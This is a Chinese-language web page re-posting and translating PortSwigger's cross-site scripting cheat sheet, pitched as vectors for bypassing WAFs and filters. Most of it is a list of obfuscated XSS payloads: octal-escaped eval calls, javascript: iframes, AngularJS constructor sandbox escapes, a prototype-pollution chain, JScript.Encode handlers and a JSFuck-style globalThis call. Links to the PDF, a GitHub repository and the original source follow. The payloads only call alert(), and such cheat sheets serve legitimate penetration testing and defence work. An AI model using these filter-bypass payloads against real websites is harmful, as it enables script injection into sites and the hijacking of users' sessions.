![2020跨站脚本[xss]速查表 xss cheat sheet](https://www.ddosi.org/wp-content/uploads/2020/06/image-15-750x450.png)
目录导航
此跨站脚本(XSS)备忘单包含许多向量,可以帮助您绕过WAF和过滤器。您可以通过事件,标签或浏览器选择向量,每个向量都包含概念证明。
该备忘单会在2020年进行定期更新。
最近更新:2020年6月4日,星期四08:57:33 +0000。
<script>eval('\141lert(1)')</script>
<script>eval('alert(\061)')</script>
<script>eval('alert(\61)')</script>
<iframe src="javascript:'%3Cscript%3Ealert(1)%3C%2Fscript%3E'"></iframe>
{{constructor.constructor('alert(1)')()}}
{}[['__proto__']]['x']=constructor.getOwnPropertyDescriptor;g={}[['__proto__']]['x'];{}[['__proto__']]['y']=g(''.sub[['__proto__']],'constructor');{}[['__proto__']]['z']=constructor.defineProperty;d={}[['__proto__']]['z'];d(''.sub[['__proto__']],'constructor',{value:false});{}[['__proto__']]['y'].value('alert(1)')()
';top['\141\154\145\162\164']('\130\123\123');//
<a href=# language="JScript.Encode" onclick="#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a>
<a href=# onclick="JScript.Encode:#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a>
';globalThis[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//中文翻译地址:
http://www.ddosi.org/bpxss.html
[水平有限,翻译不周之处请转到原文查看]
![2020跨站脚本[xss]速查表 xss cheat sheet](https://www.ddosi.org/wp-content/uploads/2020/06/image-15-1024x682.png)
目录
事件处理程序
没有用户互动
需要用户互动
限制字元
构架
通讯协定
其他有用的属性
特殊标签
编码方式
混淆
客户端模板注入
VueJS反映
AngularJS沙箱逃逸反映
AngularJS沙箱转义DOM
AngularJS CSP绕过
无脚本攻击
多重发光
WAF绕过全局对象
不可能的实验室
经典向量(XSS加密)
![2020跨站脚本[xss]速查表 xss cheat sheet](https://www.ddosi.org/wp-content/uploads/2020/06/image-14-1024x703.png)
2020跨站脚本[xss]速查表下载地址[pdf]
①burpsuite官方 : cheat-sheet.pdf
②GitHub : https://github.com/ddosi/hack
③雨苁网盘: https://w.ddosi.workers.dev/
原文地址:
https://portswigger.net/web-security/cross-site-scripting/cheat-sheet